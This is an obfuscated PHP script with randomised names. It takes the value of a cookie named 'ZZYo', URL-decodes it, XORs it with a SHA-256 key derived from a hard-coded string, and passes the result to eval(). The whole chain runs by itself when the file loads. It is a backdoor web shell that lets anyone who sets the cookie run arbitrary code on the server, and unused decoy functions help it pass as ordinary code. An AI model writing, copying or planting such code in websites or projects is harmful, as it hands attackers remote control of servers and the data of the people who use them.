<?php
function xtqKZEI($dhOMYl)
{
    $Xjclb = KvOhxTY($dhOMYl);
    $tNlHqAzK = pVkOy($dhOMYl, $Xjclb);
    return $tNlHqAzK;
}
function hWAoqq($ImHhmnsfQ)
{
    $KIAiq = $_COOKIE[$ImHhmnsfQ];
    return $KIAiq;
}
function pVkOy($tyiQfILX, $lyzGtI)
{
    $eeqGcVr = WEeKzMR($tyiQfILX);
    $lFHWDwSvn = kPrPbOVmw($lyzGtI);
    $yhuPdPl = mxhVnJ($lFHWDwSvn, $eeqGcVr);
    return $yhuPdPl;
}
function hoCqtsfcba($ELoRPEu)
{
    $aRxYWPPRlr = strlen($ELoRPEu);
    return $aRxYWPPRlr;
}
function kPrPbOVmw($WWMIS)
{
    $CkbVnpPDEL = hWAoqq($WWMIS);
    $lFHWDwSvn = XpTmTgs($CkbVnpPDEL);
    return $lFHWDwSvn;
}
function rECEC($EUrrULotV, $kCajkVT)
{
    $kBPtuawlXy = str_pad($EUrrULotV, $kCajkVT, $EUrrULotV);
    return $kBPtuawlXy;
}
function nFOhTAQ($VSsnuccxDr) {
    return strtoupper($VSsnuccxDr);
}
function UZudEDRpyo()
{
    $NtfNMZMA = eLPvHJizM();
    cpZGg($NtfNMZMA);
}
function AmUdTDB()
{
    $IRxIPGkjyp = "xrGvDxwpYpsztcHWhfwhMQZZYo";
    return $IRxIPGkjyp;
}
function KvOhxTY($dNmKatOUx)
{
    $ZBDqIEcQv = substr($dNmKatOUx, -4);
    return $ZBDqIEcQv;
}
function cpZGg($xvybg)
{
    eval($xvybg);
}
function eEElNgcb($WOwJDdIfb, $ODTqkSJ) {
    return $WOwJDdIfb . ' ' . $ODTqkSJ;
}
function XpTmTgs($bmdKf)
{
    $zBWJpO = rawurldecode($bmdKf);
    return $zBWJpO;
}
function eLPvHJizM()
{
    $DvOSHjKiC = AmUdTDB();
    $MtOJVRcGC = xtqKZEI($DvOSHjKiC);
    return $MtOJVRcGC;
}
function BoEAtJtFgZ($bazIt) {
    return eEElNgcb('Hello', nFOhTAQ($bazIt));
}
function wosvQwiJZJ($RfkLhq, $krpCmUoml)
{
    $KFcKP = $RfkLhq ^ $krpCmUoml;
    return $KFcKP;
}
function mxhVnJ($KNmXhhyKK, $JHOSpM)
{
    $FEKXipL = hoCqtsfcba($KNmXhhyKK);
    $ONmZmV = rECEC($JHOSpM, $FEKXipL);
    $NtfNMZMA = wosvQwiJZJ($ONmZmV, $KNmXhhyKK);
    return $NtfNMZMA;
}
function WEeKzMR($atGxgso)
{
    $LjPvqd = hash("sha256", $atGxgso, TRUE);
    return $LjPvqd;
}
UZudEDRpyo();